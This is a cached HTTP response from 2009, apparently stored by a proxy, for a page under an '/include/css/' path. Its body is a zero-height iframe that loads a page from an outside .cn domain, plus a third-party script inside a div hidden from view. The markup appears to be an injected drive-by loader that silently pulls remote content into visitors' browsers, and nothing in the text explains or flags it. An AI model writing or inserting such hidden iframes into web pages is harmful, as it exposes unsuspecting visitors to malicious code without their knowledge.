HTTP/1.1 200 OK
Content-Length: 205
ETag: "47f4161fa96c91:2f95"
Date: Thu, 26 Feb 2009 06:12:08 GMT
Last-Modified: Wed, 25 Feb 2009 03:37:27 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.jltao8.com/include/css/a.htm
X-Polipo-Date: Thu, 26 Feb 2009 06:22:43 GMT
X-Polipo-Access: Thu, 26 Feb 2009 06:32:41 GMT

<iframe src=http://w.mi2123.cn/gg/15.htm width=100 height=0></Iframe>
<div style="display:none;"><script language="javascript" type="text/javascript" src="http://js.users.51.la/2154116.js"></script></div>